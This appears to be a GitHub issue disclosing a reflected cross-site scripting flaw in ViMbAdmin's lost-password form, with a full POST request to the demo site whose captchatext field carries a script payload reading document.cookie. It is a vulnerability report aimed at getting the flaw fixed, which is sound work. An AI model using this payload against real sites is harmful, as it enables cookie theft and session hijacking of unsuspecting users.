Cross Site Scripting at /auth/lost-password

Lost Password had vulnerability, if  parameter captchatext longer than 10 characters, application with print out. Attacker can inject javascript in to captchatext parameter with more than 10 characters to exploit Cross Site Scripting. This is POST message:

> POST /demo/auth/lost-password HTTP/1.1
Host: www.vimbadmin.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.vimbadmin.net/demo/auth/lost-password
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
Cookie: VIMBADMIN3=1e7567b5q3qvs2aa22bm95tms2
Connection: close
Upgrade-Insecure-Requests: 1

> username=tretre&captchaid=30678101145165238eb8d978f34fd00b&requestnewimage=0&captchatext=ererterffffffffff"<script>alert(document.cookie)</script>&login=Reset+Password

After submit, javascript will run on browser:
![vimadmin_xss](https://user-images.githubusercontent.com/7539961/45796041-cd617f00-bcc8-11e8-9d45-2c2ad6fde961.png)



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Cross Site Scripting at /auth/lost-password #253

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Cross Site Scripting at /auth/lost-password #253

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions